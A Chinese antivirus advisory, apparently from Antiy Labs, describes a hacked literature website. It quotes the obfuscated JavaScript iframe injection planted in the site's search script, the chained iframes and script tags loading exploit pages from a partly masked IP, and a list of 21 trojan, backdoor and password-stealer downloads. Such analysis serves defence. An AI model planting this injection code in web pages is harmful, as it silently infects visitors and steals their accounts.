|
TOP
|
| [ 录入者:riqukiqpl | 时间:2008-01-03 01:09:54
| 作者: | 来源:采集所得
| 浏览:317次 ] |
简介:11月15日,安天实验室反病毒监测网发现,八文网网站(http://www.8***.com/search/docs/%CF%D6%B4%FA%CA%AB/1)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程..
11月15日,安天实验室反病毒监测网发现,八文网网站(http://www.8***.com
/search/docs/%CF%D6%B4%FA%CA%AB/1)被黑客植入病毒,用户如果访问该网站,会被
病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。有可能被远程控制,
盗取用户敏感信息等。
该网站的主页里的http://www.8***.com/js/search_bot.js被插入如下挂马代码:
var strBegin = "<i" + "fr" + "ame src=\"ht";
document.writeln( strBegin + "tp:\/\/60." + "190.10"
+ "1." + "2" + "06\/m1.h" + "tm?9792\" width=\"20\"
height=\"0\" fr" + "amebo");
document.writeln(strEnd);
使用了字符变量,仔细分析得到连接地址:http://60.190.101.***/m1.htm?9792
访问该地址得到代码:
很多挂马地址。
<HTML>
<script src=http://60.190.101.***/aa/aa.js></script>
</HTML>
<iframe src="http://60.190.101.***/aa/aa1.htm" width="20" height="0"
frameborder="0"></iframe>
<iframe src="http://60.190.101.***/aa/aa2.htm" width="20" height="0"
frameborder="0"></iframe>
<iframe src="http://60.190.101.***/aa/aa3.htm" width="20" height="0"
frameborder="0"></iframe>
<iframe src="http://60.190.101.***/aa/aa4.htm" width="20" height="0"
frameborder="0"></iframe>
<iframe src="http://60.190.101.***/aa/aa5.htm" width="20" height="0"
frameborder="0"></iframe>
<iframe src="http://60.190.101.***/aa/aa6.htm" width="20" height="0"
frameborder="0"></iframe>
<iframe src="http://60.190.101.***/aa/aa.htm" width="20" height="0"
frameborder="0"></iframe>
http://60.190.101.***/aa/aa.js为加密网马:
http://60.190.101.***/aa/aa1.htm
被插入:http://60.190.101.***/aa/ccc1.js
http://60.190.101.***/aa/ccc1.js得到挂马代码:
http://60.190.101.***/aa/aa2.htm代码:
http://60.190.101.***/aa/aa3.htm被插入:
<script language=javascript
src=http://60.190.101.***/aa/xl.js></script>
http://60.190.101.***/aa/xl.js为讯雷漏洞网马:
http://60.190.101.***/aa/aa4.htm代码:
http://60.190.101.***/aa/aa5.htm 被插入:
script language=javascript
src=http://60.190.101.***/aa/bb.js></script>
http://60.190.101.***/aa/bb.js的代码:
http://60.190.101.***/aa/aa6.htm得到代码:
http://60.190.101.***/aa/aa.htm代码:
当用户访问http://www.8***.com/search/docs/%CF%D6%B4%FA%CA%AB/1时,
系统会自动隐藏下载以下病毒文件:
http://60.190.101.***/abc.exe
病毒名:(Worm.Win32.Downloader.f) 蠕虫下载者木马
http://60.190.101.***/aa1.exe
病毒名:(Trojan-Downloader.Win32.Delf.aas) 下载者木马
一旦运行该木马将下载以下病毒到用户的系统,并运行。
http://60.190.101.***/aa2.exe
病毒名:(Backdoor.Win32.Agent.afh) 后门木马
http://60.190.101.***/aa3.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hpj) 盗号木马
http://60.190.101.***/aa4.exe
病毒名:(rojan-PSW.Win32.OnLineGames.hqn) 盗号木马
http://60.190.101.***/aa5.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.fyn) 游戏盗号木马
http://60.190.101.***/aa6.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.gny) 游戏盗号木马
http://60.190.101.***/aa7.exe
病毒名:(Trojan-Downloader.Win32.Agent.blm) 下载者木马
http://60.190.101.***/aa8.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.gti) 盗号木马
http://60.190.101.***/aa9.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hqy) 游戏木马
http://60.190.101.***/aa10.exe
病毒名:(Trojan-PSW.Win32.Lmir.bos) 游戏木马
http://60.190.101.***/aa11.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.gxb) 游戏盗号木马
http://60.190.101.***/aa12.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hcp) 游戏盗号木马
http://60.190.101.***/aa13.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hnt) 游戏盗号木马
http://60.190.101.***/aa14.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hqc) 游戏盗号木马
http://60.190.101.***/aa15.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hfd) 游戏木马
http://60.190.101.***/aa16.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hfr) 游戏盗号木马
http://60.190.101.***/aa17.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hqx) 游戏木马
http://60.190.101.***/aa18.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hqh) 游戏木马
http://60.190.101.***/aa19.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hre) 游戏木马
http://60.190.101.***/aa20.exe
病毒名:(Backdoor.Win32.Delf.awy) 后门木马
http://60.190.101.***/aa21.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ghq) 游戏木马 |
|
|
|
